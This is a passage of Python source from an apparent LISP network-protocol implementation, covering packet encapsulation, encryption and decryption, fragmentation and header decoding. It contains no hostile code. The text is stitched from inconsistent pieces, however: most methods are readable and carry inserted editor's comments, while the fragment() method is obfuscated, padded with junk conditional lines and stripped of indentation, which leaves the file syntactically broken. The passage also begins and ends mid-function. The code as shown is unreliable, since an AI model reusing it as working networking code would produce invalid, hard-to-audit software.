            for addr in entry[netifaces.AF_INET]:
                addr_str = addr["addr"]
                if (addr_str.find("127.0.0.1") != -1): continue
                address_list.append(addr_str)

        if (netifaces.AF_INET6 in entry):
            for addr in entry[netifaces.AF_INET6]:
                addr_str = addr["addr"]
                if (addr_str == "::1"): continue
                if (addr_str[0:5] == "fe80:"): continue
                address_list.append(addr_str)

    return(address_list)
def lisp_get_all_multicast_rles():
    #
    # Collect multicast RLE addresses from lisp.config.
    #
    rles = []
    out = getoutput('egrep "rle-address =" ./lisp.config')
    if (out == ""): return(rles)

    lines = out.split("\n")
    for line in lines:
        if (line[0] == "#"): continue
        rle = line.split("rle-address = ")[1]
        first_byte = int(rle.split(".")[0])
        if (first_byte >= 224 and first_byte < 240): rles.append(rle)
    return(rles)
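#
# Example (editor's illustration): a matching lisp.config line such as
#   rle-address = 224.1.1.1
# is returned because 224.0.0.0 through 239.255.255.255 is the IPv4
# multicast range tested above.
#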
class lisp_packet(object):
    def __init__(self, packet):
        self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.outer_tos = 0
        self.outer_ttl = 0
        self.udp_sport = 0
        self.udp_dport = 0
        self.udp_length = 0
        self.udp_checksum = 0
        self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.inner_tos = 0
        self.inner_ttl = 0
        self.inner_protocol = 0
        self.inner_sport = 0
        self.inner_dport = 0
        self.lisp_header = lisp_data_header()
        self.packet = packet
        self.inner_version = 0
        self.outer_version = 0
        self.encap_port = LISP_DATA_PORT
        self.inner_is_fragment = False
        self.packet_error = ""
        self.gleaned_dest = False
    def encode(self, nonce):
        #
        # We cannot encapsulate without an outer source RLOC.
        #
        if (self.outer_source.is_null()): return(None)

        #
        # Use the supplied nonce, echo a request-nonce, or generate a
        # new random data-plane nonce.
        #
        if (nonce == None):
            self.lisp_header.nonce(lisp_get_data_nonce())
        elif (self.lisp_header.is_request_nonce(nonce)):
            self.lisp_header.request_nonce(nonce)
        else:
            self.lisp_header.nonce(nonce)

        self.lisp_header.instance_id(self.inner_dest.instance_id)

        #
        # Encrypt the inner packet when a key has been negotiated for
        # this RLOC. Encryption is skipped when the instance-ID is
        # 0xffffff.
        #
        self.lisp_header.key_id(0)
        control = (self.lisp_header.get_instance_id() == 0xffffff)
        if (lisp_data_plane_security and control == False):
            addr_str = self.outer_dest.print_address_no_iid() + ":" + \
                str(self.encap_port)

            if (addr_str in lisp_crypto_keys_by_rloc_encap):
                keys = lisp_crypto_keys_by_rloc_encap[addr_str]
                if (keys[1]):
                    keys[1].use_count += 1
                    packet, encrypted = self.encrypt(keys[1], addr_str)
                    if (encrypted): self.packet = packet

        #
        # Build the UDP header. The source port is the standard data
        # port, a crypto ephemeral port, or derived from the inner
        # packet via hash_packet().
        #
        self.udp_checksum = 0
        if (self.encap_port == LISP_DATA_PORT):
            if (lisp_crypto_ephem_port == None):
                if (self.gleaned_dest):
                    self.udp_sport = LISP_DATA_PORT
                else:
                    self.hash_packet()
            else:
                self.udp_sport = lisp_crypto_ephem_port
        else:
            self.udp_sport = LISP_DATA_PORT

        self.udp_dport = self.encap_port
        self.udp_length = len(self.packet) + 16

        sport = socket.htons(self.udp_sport)
        dport = socket.htons(self.udp_dport)
        udp_len = socket.htons(self.udp_length)
        udp = struct.pack("HHHH", sport, dport, udp_len, self.udp_checksum)

        #
        # Encode the LISP data header.
        #
        lisp = self.lisp_header.encode()

        #
        # Build the outer IP header. For IPv6 the kernel prepends the
        # header when the packet is sent on a raw socket.
        #
        if (self.outer_version == 4):
            tl = socket.htons(self.udp_length + 20)
            frag = socket.htons(0x4000)
            outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
                frag, self.outer_ttl, 17, 0)
            outer += self.outer_source.pack_address()
            outer += self.outer_dest.pack_address()
            outer = lisp_ip_checksum(outer)
        elif (self.outer_version == 6):
            outer = b""
        else:
            return(None)

        self.packet = outer + udp + lisp + self.packet
        return(self)
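    #
    # Resulting encapsulation, from the final concatenation above
    # (editor's illustration):
    #
    #   +----------+------------+-------------+----------------------+
    #   | outer IP | UDP header | LISP header | original inner packet|
    #   +----------+------------+-------------+----------------------+
    #
    # For an IPv6 outer header the IP portion is empty here; the kernel
    # fills it in on send (assumed from the b"" above).
    #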
    def cipher_pad(self, packet):
        #
        # Pad with trailing spaces to a multiple of the 16-byte AES
        # block size.
        #
        length = len(packet)
        if ((length % 16) != 0):
            pad_length = (old_div(length, 16) + 1) * 16
            packet = packet.ljust(pad_length)
        return(packet)
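    #
    # Example (editor's illustration): a 30-byte buffer becomes 32
    # bytes. ChaCha20 is a stream cipher and would not strictly need
    # this, but AES-CBC encrypts whole 16-byte blocks.
    #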
    def encrypt(self, key, addr_str):
        if (key == None or key.shared_key == None):
            return([self.packet, False])

        #
        # Pad the plaintext to the AES block size and get an IV for
        # this packet.
        #
        packet = self.cipher_pad(self.packet)
        iv = key.get_iv()

        ts = lisp_get_timestamp()
        digest_func = None
        if (key.cipher_suite == LISP_CS_25519_CHACHA):
            encrypt_func = chacha.ChaCha(key.encrypt_key, iv).encrypt
        elif (key.cipher_suite == LISP_CS_25519_GCM):
            aes_key = binascii.unhexlify(key.encrypt_key)
            try:
                gcm = AES.new(aes_key, AES.MODE_GCM, iv)
                encrypt_func = gcm.encrypt
                digest_func = gcm.digest
            except:
                lprint("You need AES-GCM, do a 'pip install pycryptodome'")
                return([self.packet, False])
        else:
            aes_key = binascii.unhexlify(key.encrypt_key)
            encrypt_func = AES.new(aes_key, AES.MODE_CBC, iv).encrypt

        ciphertext = encrypt_func(packet)

        if (ciphertext == None): return([self.packet, False])
        ts = int(str(time.time() - ts).split(".")[1][0:6])

        #
        # Convert the ciphertext back to a byte string.
        #
        ciphertext = ciphertext.encode("raw_unicode_escape")

        #
        # Append the GCM authentication tag to the ciphertext.
        #
        if (digest_func != None): ciphertext += digest_func()

        #
        # Compute the ICV over the LISP header, IV, and ciphertext.
        #
        self.lisp_header.key_id(key.key_id)
        lisp = self.lisp_header.encode()

        icv = key.do_icv(lisp + iv + ciphertext, iv)

        icv_len = 4 if (key.do_poly) else 8

        encrypt_str = bold("Encrypt", False)
        cipher_str = bold(key.cipher_suite_string, False)
        addr_str = "RLOC: " + red(addr_str, False)
        hash_str = "poly" if key.do_poly else "sha256"
        hash_str = bold(hash_str, False)
        icv_str = "ICV({}): 0x{}...{}".format(hash_str, icv[0:icv_len],
            icv[-icv_len::])
        dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format(
            encrypt_str, key.key_id, addr_str, icv_str, cipher_str, ts))

        #
        # Pack the ICV in network byte order: 16 bytes for poly1305,
        # 20 bytes for truncated sha256.
        #
        icv = int(icv, 16)
        if (key.do_poly):
            icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
            icv2 = byte_swap_64(icv & LISP_8_64_MASK)
            icv = struct.pack("QQ", icv1, icv2)
        else:
            icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
            icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
            icv3 = socket.htonl(icv & 0xffffffff)
            icv = struct.pack("QQI", icv1, icv2, icv3)

        return([iv + ciphertext + icv, True])
    def decrypt(self, packet, header_length, key, addr_str):
        #
        # Remove the trailing ICV from the packet: 16 bytes for
        # poly1305, 20 bytes for truncated sha256.
        #
        if (key.do_poly):
            icv1, icv2 = struct.unpack("QQ", packet[-16::])
            packet_icv = byte_swap_64(icv1) << 64
            packet_icv |= byte_swap_64(icv2)
            packet_icv = lisp_hex_string(packet_icv).zfill(32)
            packet = packet[0:-16]
            icv_len = 4
            hash_str = bold("poly", False)
        else:
            icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
            packet_icv = byte_swap_64(icv1) << 96
            packet_icv |= byte_swap_64(icv2) << 32
            packet_icv |= socket.htonl(icv3)
            packet_icv = lisp_hex_string(packet_icv).zfill(40)
            packet = packet[0:-20]
            icv_len = 8
            hash_str = bold("sha", False)

        lisp = self.lisp_header.encode()

        #
        # The IV length depends on the cipher suite.
        #
        if (key.cipher_suite == LISP_CS_25519_CHACHA):
            iv_len = 8
            cipher_str = bold("chacha", False)
        elif (key.cipher_suite == LISP_CS_25519_GCM):
            iv_len = 12
            cipher_str = bold("aes-gcm", False)
        else:
            iv_len = 16
            cipher_str = bold("aes-cbc", False)

        iv = packet[0:iv_len]

        #
        # Recompute the ICV and compare with the one from the packet.
        #
        computed_icv = key.do_icv(lisp + packet, iv)

        packet_icv_str = "0x{}...{}".format(packet_icv[0:icv_len],
            packet_icv[-icv_len::])
        computed_icv_str = "0x{}...{}".format(computed_icv[0:icv_len],
            computed_icv[-icv_len::])

        if (computed_icv != packet_icv):
            self.packet_error = "ICV-error"
            cipher_hash_str = cipher_str + "/" + hash_str
            fail_str = bold("ICV failed ({})".format(cipher_hash_str), False)
            icv_str = "packet-ICV {} != computed-ICV {}".format(packet_icv_str,
                computed_icv_str)
            dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
                "packet dropped, {}").format(fail_str, red(addr_str, False),
                self.udp_sport, key.key_id, icv_str))
            dprint("{}".format(key.print_keys()))

            #
            # Try other stored keys in case the remote xTR rekeyed.
            #
            lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
            return([None, False])

        #
        # Strip the IV and decrypt.
        #
        packet = packet[iv_len::]

        ts = lisp_get_timestamp()
        if (key.cipher_suite == LISP_CS_25519_CHACHA):
            decrypt_func = chacha.ChaCha(key.encrypt_key, iv).decrypt
        elif (key.cipher_suite == LISP_CS_25519_GCM):
            aes_key = binascii.unhexlify(key.encrypt_key)
            try:
                decrypt_func = AES.new(aes_key, AES.MODE_GCM, iv).decrypt
            except:
                self.packet_error = "no-decrypt-key"
                lprint("You need AES-GCM, do a 'pip install pycryptodome'")
                return([None, False])
        else:
            if ((len(packet) % 16) != 0):
                dprint("Ciphertext not multiple of 16 bytes, packet dropped")
                return([None, False])

            aes_key = binascii.unhexlify(key.encrypt_key)
            decrypt_func = AES.new(aes_key, AES.MODE_CBC, iv).decrypt

        plaintext = decrypt_func(packet)
        ts = int(str(time.time() - ts).split(".")[1][0:6])

        decrypt_str = bold("Decrypt", False)
        addr_str = "RLOC: " + red(addr_str, False)
        hash_name = "poly" if key.do_poly else "sha256"
        hash_name = bold(hash_name, False)
        icv_str = "ICV({}): {}".format(hash_name, packet_icv_str)
        dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec".format(
            decrypt_str, key.key_id, addr_str, icv_str, cipher_str, ts))

        #
        # Return the outer headers followed by the decrypted inner
        # packet.
        #
        self.packet = self.packet[0:header_length]
        return([plaintext, True])
    def fragment_outer(self, outer_hdr, inner_packet):
        frag_len = 1000

        #
        # Break the inner packet into frag_len-sized pieces.
        #
        frag_payloads = []
        offset = 0
        length = len(inner_packet)
        while (offset < length):
            frag = inner_packet[offset::]
            if (len(frag) > frag_len): frag = frag[0:frag_len]
            frag_payloads.append(frag)
            offset += len(frag)

        #
        # Prepend an outer IPv4 header to each piece, setting the
        # fragment-offset field (in 8-byte units) and the
        # more-fragments bit on all but the last fragment.
        #
        fragments = []
        offset = 0
        for frag in frag_payloads:
            frag_field = offset if (frag == frag_payloads[-1]) else \
                0x2000 + offset
            frag_field = socket.htons(frag_field)
            outer_hdr = outer_hdr[0:6] + struct.pack("H", frag_field) + \
                outer_hdr[8::]

            #
            # Fix the total-length field and recompute the checksum.
            #
            tl = socket.htons(len(frag) + 20)
            outer_hdr = outer_hdr[0:2] + struct.pack("H", tl) + outer_hdr[4::]
            outer_hdr = lisp_ip_checksum(outer_hdr)
            fragments.append(outer_hdr + frag)
            offset += len(frag) // 8

        return(fragments)
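    #
    # Fragment-offset arithmetic (editor's illustration): IPv4 offsets
    # are expressed in 8-byte units, so the 1000-byte pieces above
    # advance the offset by 125 per fragment: 0, 125, 250, and so on.
    # All but the last fragment carry the 0x2000 more-fragments bit.
    #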
    def send_icmp_too_big(self, inner_packet):
        global lisp_last_icmp_too_big_sent
        global lisp_icmp_raw_socket

        #
        # Rate-limit ICMP Too-Big messages.
        #
        elapsed = time.time() - lisp_last_icmp_too_big_sent
        if (elapsed < LISP_ICMP_TOO_BIG_RATE_LIMIT):
            lprint("Rate limit sending ICMP Too-Big to {}".format(
                self.inner_source.print_address_no_iid()))
            return(False)

        #
        # Build an ICMP Destination Unreachable (type 3), Fragmentation
        # Needed (code 4) message advertising a next-hop MTU of 1400,
        # including the IP header plus 8 bytes of the offending packet.
        #
        mtu = socket.htons(1400)
        icmp = struct.pack("BBHHH", 3, 4, 0, 0, mtu)
        icmp += inner_packet[0:20+8]
        icmp = lisp_icmp_checksum(icmp)

        #
        # Send from our RLOC address back to the inner packet's source.
        #
        dest = inner_packet[12:16]
        dest_str = self.inner_source.print_address_no_iid()
        source = self.outer_source.pack_address()

        #
        # Build the IPv4 header: total-length 56, TTL 32, protocol ICMP.
        #
        tl = socket.htons(20 + 36)
        ip = struct.pack("BBHHHBBH", 0x45, 0, tl, 0, 0, 32, 1, 0) + \
            source + dest
        ip = lisp_ip_checksum(ip)
        ip = self.fix_outer_header(ip)
        ip += icmp
        tb_str = bold("Too-Big", False)
        lprint("Send ICMP {} to {}, mtu 1400: {}".format(tb_str, dest_str,
            lisp_format_packet(ip)))

        try:
            lisp_icmp_raw_socket.sendto(ip, (dest_str, 0))
        except socket.error as e:
            lprint("lisp_icmp_raw_socket.sendto() failed: {}".format(e))
            return(False)

        lisp_last_icmp_too_big_sent = lisp_get_timestamp()
        return(True)
def fragment ( self ) :
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
if 44 - 44: OoO0O00 * oO0o
Oo00oo = self . fix_outer_header ( self . packet )
if 54 - 54: Ii1I % i1IIi
if 51 - 51: iIii1I11I1II1 - I1IiiI
if 61 - 61: OoooooooOO . Ii1I % oO0o * OoooooooOO
if 96 - 96: Ii1I - II111iiii % OoOoOO00 * I1IiiI * I1IiiI . Oo0Ooo
if 75 - 75: Oo0Ooo + Ii1I + OoO0O00
if 97 - 97: ooOoO0o % i11iIiiIii % I11i
i1iIii = len ( Oo00oo )
if ( i1iIii <= 1500 ) : return ( [ Oo00oo ] , "Fragment-None" )
if 21 - 21: Oo0Ooo / Ii1I / I1ii11iIi11i / i1IIi / o0oOOo0O0Ooo
Oo00oo = self . packet
if 86 - 86: i1IIi
if 33 - 33: OoOoOO00 % i11iIiiIii * OOooOOo
if 69 - 69: II111iiii + Oo0Ooo - oO0o . Oo0Ooo / iIii1I11I1II1 * iIii1I11I1II1
if 75 - 75: OoO0O00 % OoooooooOO
if 16 - 16: O0 / i1IIi
if ( self . inner_version != 4 ) :
OOoo0 = random . randint ( 0 , 0xffff )
Ii11I1iIIi = Oo00oo [ 0 : 4 ] + struct . pack ( "H" , OOoo0 ) + Oo00oo [ 6 : 20 ]
O0ooO = Oo00oo [ 20 : : ]
I1iiII = self . fragment_outer ( Ii11I1iIIi , O0ooO )
return ( I1iiII , "Fragment-Outer" )
if 40 - 40: o0oOOo0O0Ooo . o0oOOo0O0Ooo * i11iIiiIii
if 44 - 44: o0oOOo0O0Ooo
if 80 - 80: I1ii11iIi11i + I11i - ooOoO0o - o0oOOo0O0Ooo % Ii1I
if 85 - 85: I1Ii111
if 62 - 62: Ii1I % II111iiii + IiII + OOooOOo % oO0o . I1IiiI
OOoOo0ooOoo = 56 if ( self . outer_version == 6 ) else 36
Ii11I1iIIi = Oo00oo [ 0 : OOoOo0ooOoo ]
oO0OO00 = Oo00oo [ OOoOo0ooOoo : OOoOo0ooOoo + 20 ]
O0ooO = Oo00oo [ OOoOo0ooOoo + 20 : : ]
if 16 - 16: OoooooooOO / oO0o . Ii1I * ooOoO0o - I1IiiI
if 32 - 32: I1IiiI / OoO0O00
if 28 - 28: Oo0Ooo / IiII . iII111i + OoO0O00 + I11i % Oo0Ooo
if 45 - 45: Oo0Ooo / O0 % OoooooooOO
if 92 - 92: Ii1I . OoOoOO00 . I11i - OoooooooOO / ooOoO0o
ooOo0 = struct . unpack ( "H" , oO0OO00 [ 6 : 8 ] ) [ 0 ]
ooOo0 = socket . ntohs ( ooOo0 )
if ( ooOo0 & 0x4000 ) :
if ( lisp_icmp_raw_socket != None ) :
I11I1i = Oo00oo [ OOoOo0ooOoo : : ]
if ( self . send_icmp_too_big ( I11I1i ) ) : return ( [ ] , None )
if 100 - 100: oO0o
if ( lisp_ignore_df_bit ) :
ooOo0 &= ~ 0x4000
else :
iiIiiiIii11i1 = bold ( "DF-bit set" , False )
dprint ( "{} in inner header, packet discarded" . format ( iiIiiiIii11i1 ) )
return ( [ ] , "Fragment-None-DF-bit" )
if 87 - 87: OoO0O00 + OoooooooOO . ooOoO0o * I11i
if 82 - 82: iIii1I11I1II1 * OoooooooOO
if 50 - 50: I1Ii111 - II111iiii
oo00 = 0
i1iIii = len ( O0ooO )
I1iiII = [ ]
while ( oo00 < i1iIii ) :
I1iiII . append ( O0ooO [ oo00 : oo00 + 1400 ] )
oo00 += 1400
if 33 - 33: IiII / IiII . i11iIiiIii * I1ii11iIi11i + o0oOOo0O0Ooo
if 16 - 16: IiII
if 10 - 10: OoOoOO00 . IiII * iIii1I11I1II1 - oO0o - OoOoOO00 / I1Ii111
if 13 - 13: oO0o + OoOoOO00 % IiII % OoooooooOO
if 22 - 22: I1Ii111
OO0O00 = I1iiII
I1iiII = [ ]
iI1iIi1 = True if ooOo0 & 0x2000 else False
ooOo0 = ( ooOo0 & 0x1fff ) * 8
for Ii in OO0O00 :
if 67 - 67: IiII - iIii1I11I1II1 % OOooOOo + I1ii11iIi11i
if 94 - 94: I1Ii111
if 39 - 39: OoooooooOO
if 19 - 19: i11iIiiIii
oOOOO = old_div ( ooOo0 , 8 )
if ( iI1iIi1 ) :
oOOOO |= 0x2000
elif ( Ii != OO0O00 [ - 1 ] ) :
oOOOO |= 0x2000
if 82 - 82: i1IIi + o0oOOo0O0Ooo - II111iiii . Ii1I
oOOOO = socket . htons ( oOOOO )
oO0OO00 = oO0OO00 [ 0 : 6 ] + struct . pack ( "H" , oOOOO ) + oO0OO00 [ 8 : : ]
if 93 - 93: II111iiii * OoOoOO00 % o0oOOo0O0Ooo
if 67 - 67: o0oOOo0O0Ooo + Oo0Ooo . ooOoO0o - i1IIi . OoOoOO00
if 12 - 12: IiII / OoO0O00 / O0 * IiII
if 51 - 51: ooOoO0o * iII111i / i1IIi
if 2 - 2: oO0o + IiII . iII111i - i1IIi + I1Ii111
if 54 - 54: OoooooooOO . oO0o - iII111i
i1iIii = len ( Ii )
ooOo0 += i1iIii
oOO0O00o0O0 = socket . htons ( i1iIii + 20 )
oO0OO00 = oO0OO00 [ 0 : 2 ] + struct . pack ( "H" , oOO0O00o0O0 ) + oO0OO00 [ 4 : 10 ] + struct . pack ( "H" , 0 ) + oO0OO00 [ 12 : : ]
if 76 - 76: I1Ii111
oO0OO00 = lisp_ip_checksum ( oO0OO00 )
O00o0 = oO0OO00 + Ii
if 98 - 98: iIii1I11I1II1 + i11iIiiIii * I1ii11iIi11i / I1Ii111 / ooOoO0o - O0
if 42 - 42: iII111i
if 77 - 77: i1IIi * oO0o % OoooooooOO + O0 * ooOoO0o
if 28 - 28: I11i . OoooooooOO * OOooOOo + i11iIiiIii % I1IiiI . iIii1I11I1II1
if 63 - 63: II111iiii - I11i . OoOoOO00
i1iIii = len ( O00o0 )
if ( self . outer_version == 4 ) :
oOO0O00o0O0 = i1iIii + OOoOo0ooOoo
i1iIii += 16
Ii11I1iIIi = Ii11I1iIIi [ 0 : 2 ] + struct . pack ( "H" , oOO0O00o0O0 ) + Ii11I1iIIi [ 4 : : ]
if 8 - 8: I1IiiI * ooOoO0o / IiII + OoOoOO00 . IiII - OOooOOo
Ii11I1iIIi = lisp_ip_checksum ( Ii11I1iIIi )
O00o0 = Ii11I1iIIi + O00o0
O00o0 = self . fix_outer_header ( O00o0 )
if 80 - 80: iIii1I11I1II1 / oO0o * Oo0Ooo - OOooOOo * iII111i
if 97 - 97: IiII - I11i / II111iiii
if 26 - 26: iII111i + O0 * iII111i . i1IIi
if 50 - 50: iIii1I11I1II1 - I11i % iII111i - Oo0Ooo
if 52 - 52: oO0o + Ii1I - I1ii11iIi11i * Ii1I . OOooOOo + I1Ii111
iI11II11I1 = OOoOo0ooOoo - 12
oOO0O00o0O0 = socket . htons ( i1iIii )
O00o0 = O00o0 [ 0 : iI11II11I1 ] + struct . pack ( "H" , oOO0O00o0O0 ) + O00o0 [ iI11II11I1 + 2 : : ]
if 67 - 67: I1ii11iIi11i
I1iiII . append ( O00o0 )
if 3 - 3: I1Ii111 . I11i % II111iiii * I1IiiI % i1IIi * OoO0O00
return ( I1iiII , "Fragment-Inner" )
    def fix_outer_header(self, packet):
        #
        # When either header is IPv4, raw sockets want the IPv4
        # total-length field byte-swapped from the network order that
        # lisp_ip_checksum() wrote. On macOS the fragment-offset field
        # needs the same treatment.
        #
        if (self.outer_version == 4 or self.inner_version == 4):
            if (lisp_is_macos()):
                packet = packet[0:2] + packet[3:4] + packet[2:3] + packet[4:6] + packet[7:8] + packet[6:7] + packet[8::]
            else:
                packet = packet[0:2] + packet[3:4] + packet[2:3] + packet[4::]

        return (packet)
    def send_packet(self, lisp_raw_socket, dest):
        if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)

        dest = dest.print_address_no_iid()
        fragments, reason = self.fragment()

        for fragment in fragments:
            if (len(fragments) != 1):
                self.packet = fragment
                self.print_packet(reason, True)

            try: lisp_raw_socket.sendto(fragment, (dest, 0))
            except socket.error as e:
                lprint("socket.sendto() failed: {}".format(e))
    def send_l2_packet(self, l2_socket, mac_header):
        if (l2_socket == None):
            lprint("No layer-2 socket, drop IPv6 packet")
            return

        if (mac_header == None):
            lprint("Could not build MAC header, drop IPv6 packet")
            return

        #
        # Frame the packet with the MAC header and write it to the
        # layer-2 (tap) device.
        #
        packet = mac_header + self.packet
        l2_socket.write(packet)
        return
    def bridge_l2_packet(self, eid, db):
        try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
        except: return
        try: interface = lisp_myinterfaces[dyn_eid.interface]
        except: return
        try:
            # Named bridge_socket so it does not shadow the socket module
            # (the original local name made the except clause below
            # unreachable).
            bridge_socket = interface.get_bridge_socket()
            if (bridge_socket == None): return
        except: return

        try: bridge_socket.send(self.packet)
        except socket.error as e:
            lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
    def is_lisp_packet(self, packet):
        udp = (struct.unpack("B", packet[9:10])[0] == LISP_UDP_PROTOCOL)
        if (udp == False): return (False)

        port = struct.unpack("H", packet[22:24])[0]
        if (socket.ntohs(port) == LISP_DATA_PORT): return (True)
        port = struct.unpack("H", packet[20:22])[0]
        if (socket.ntohs(port) == LISP_DATA_PORT): return (True)
        return (False)
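    #
    # Note on the checks above (annotation, not original code): byte 9 of
    # an IPv4 header is the protocol field, and bytes 20-21 / 22-23 are
    # the UDP source and destination ports. A packet counts as LISP when
    # it is UDP and either port equals 4341 (LISP_DATA_PORT).
    #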
    def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
        self.packet_error = ""
        packet = self.packet
        orig_len = len(packet)
        is_l3 = is_l2 = True

        #
        # Decode outer header, UDP header, and LISP header when this is
        # an encapsulated packet.
        #
        header_len = 0
        iid = self.lisp_header.get_instance_id()
        if (is_lisp_packet):
            version = struct.unpack("B", packet[0:1])[0]
            self.outer_version = version >> 4
            if (self.outer_version == 4):
                #
                # Verify the IPv4 header checksum. Recomputing over the
                # header should leave 0 in the checksum field; a stored
                # value of 0 is tolerated on macOS (checksum offload).
                #
                old_checksum = struct.unpack("H", packet[10:12])[0]
                packet = lisp_ip_checksum(packet)
                new_checksum = struct.unpack("H", packet[10:12])[0]
                if (new_checksum != 0):
                    if (old_checksum != 0 or lisp_is_macos() == False):
                        self.packet_error = "checksum-error"
                        if (stats):
                            stats[self.packet_error].increment(orig_len)

                        lprint("IPv4 header checksum failed for outer header")
                        if (lisp_flow_logging): self.log_flow(False)
                        return (None)

                afi = LISP_AFI_IPV4
                offset = 12
                self.outer_tos = struct.unpack("B", packet[1:2])[0]
                self.outer_ttl = struct.unpack("B", packet[8:9])[0]
                header_len = 20
            elif (self.outer_version == 6):
                afi = LISP_AFI_IPV6
                offset = 8
                tc = struct.unpack("H", packet[0:2])[0]
                self.outer_tos = (socket.ntohs(tc) >> 4) & 0xff
                self.outer_ttl = struct.unpack("B", packet[7:8])[0]
                header_len = 40
            else:
                self.packet_error = "outer-header-error"
                if (stats): stats[self.packet_error].increment(orig_len)
                lprint("Cannot decode outer header")
                return (None)

            self.outer_source.afi = afi
            self.outer_dest.afi = afi
            addr_len = self.outer_source.addr_length()

            self.outer_source.unpack_address(packet[offset:offset + addr_len])
            offset += addr_len
            self.outer_dest.unpack_address(packet[offset:offset + addr_len])
            packet = packet[header_len::]
            self.outer_source.mask_len = self.outer_source.host_mask_len()
            self.outer_dest.mask_len = self.outer_dest.host_mask_len()

            #
            # Decode the UDP header.
            #
            short = struct.unpack("H", packet[0:2])[0]
            self.udp_sport = socket.ntohs(short)
            short = struct.unpack("H", packet[2:4])[0]
            self.udp_dport = socket.ntohs(short)
            short = struct.unpack("H", packet[4:6])[0]
            self.udp_length = socket.ntohs(short)
            short = struct.unpack("H", packet[6:8])[0]
            self.udp_checksum = socket.ntohs(short)
            packet = packet[8::]

            #
            # Classify as L3 (port 4341) or L2 (8472 or 4789) based on
            # the UDP ports.
            #
            is_l3 = (self.udp_dport == LISP_DATA_PORT or
                self.udp_sport == LISP_DATA_PORT)
            is_l2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))

            #
            # Decode the 8-byte LISP header.
            #
            if (self.lisp_header.decode(packet) == False):
                self.packet_error = "lisp-header-error"
                if (stats): stats[self.packet_error].increment(orig_len)

                if (lisp_flow_logging): self.log_flow(False)
                lprint("Cannot decode LISP header")
                return (None)

            packet = packet[8::]
            iid = self.lisp_header.get_instance_id()
            header_len += 16

        if (iid == 0xffffff): iid = 0

        #
        # Decrypt the payload when the header's key-id (KK bits) is
        # nonzero and we have the RLOC's decryption key.
        #
        decrypted = False
        key_id = self.lisp_header.k_bits
        if (key_id):
            addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
                self.udp_sport)
            if (addr_str == None):
                self.packet_error = "no-decrypt-key"
                if (stats): stats[self.packet_error].increment(orig_len)

                self.print_packet("Receive", is_lisp_packet)
                no_key = bold("No key available", False)
                dprint("{} for key-id {} to decrypt packet".format(no_key, key_id))
                if (lisp_flow_logging): self.log_flow(False)
                return (None)

            key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
            if (key == None):
                self.packet_error = "no-decrypt-key"
                if (stats): stats[self.packet_error].increment(orig_len)

                self.print_packet("Receive", is_lisp_packet)
                no_key = bold("No key available", False)
                dprint("{} to decrypt packet from RLOC {}".format(no_key,
                    red(addr_str, False)))
                if (lisp_flow_logging): self.log_flow(False)
                return (None)

            key.use_count += 1
            packet, decrypted = self.decrypt(packet, header_len, key, addr_str)
            if (decrypted == False):
                if (stats): stats[self.packet_error].increment(orig_len)
                if (lisp_flow_logging): self.log_flow(False)
                return (None)

        #
        # Python2/3 compatibility: keep the inner header indexable as a
        # byte string.
        #
        packet = packet.encode("raw_unicode_escape")

        #
        # Decode the inner header: IPv4, IPv6, or MAC (for L2 overlays).
        #
        version = struct.unpack("B", packet[0:1])[0]
        self.inner_version = version >> 4
        if (is_l3 and self.inner_version == 4 and version >= 0x45):
            packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
            self.inner_tos = struct.unpack("B", packet[1:2])[0]
            self.inner_ttl = struct.unpack("B", packet[8:9])[0]
            self.inner_protocol = struct.unpack("B", packet[9:10])[0]
            self.inner_source.afi = LISP_AFI_IPV4
            self.inner_dest.afi = LISP_AFI_IPV4
            self.inner_source.unpack_address(packet[12:16])
            self.inner_dest.unpack_address(packet[16:20])
            frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
            self.inner_is_fragment = (frag_field & 0x2000 or frag_field != 0)
            if (self.inner_protocol == LISP_UDP_PROTOCOL):
                self.inner_sport = struct.unpack("H", packet[20:22])[0]
                self.inner_sport = socket.ntohs(self.inner_sport)
                self.inner_dport = struct.unpack("H", packet[22:24])[0]
                self.inner_dport = socket.ntohs(self.inner_dport)

        elif (is_l3 and self.inner_version == 6 and version >= 0x60):
            packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
            tc = struct.unpack("H", packet[0:2])[0]
            self.inner_tos = (socket.ntohs(tc) >> 4) & 0xff
            self.inner_ttl = struct.unpack("B", packet[7:8])[0]
            self.inner_protocol = struct.unpack("B", packet[6:7])[0]
            self.inner_source.afi = LISP_AFI_IPV6
            self.inner_dest.afi = LISP_AFI_IPV6
            self.inner_source.unpack_address(packet[8:24])
            self.inner_dest.unpack_address(packet[24:40])
            if (self.inner_protocol == LISP_UDP_PROTOCOL):
                self.inner_sport = struct.unpack("H", packet[40:42])[0]
                self.inner_sport = socket.ntohs(self.inner_sport)
                self.inner_dport = struct.unpack("H", packet[42:44])[0]
                self.inner_dport = socket.ntohs(self.inner_dport)

        elif (is_l2):
            packet_len = len(packet)
            self.inner_tos = 0
            self.inner_ttl = 0
            self.inner_protocol = 0
            self.inner_source.afi = LISP_AFI_MAC
            self.inner_dest.afi = LISP_AFI_MAC
            self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
            self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
        elif (self.lisp_header.get_instance_id() == 0xffffff):
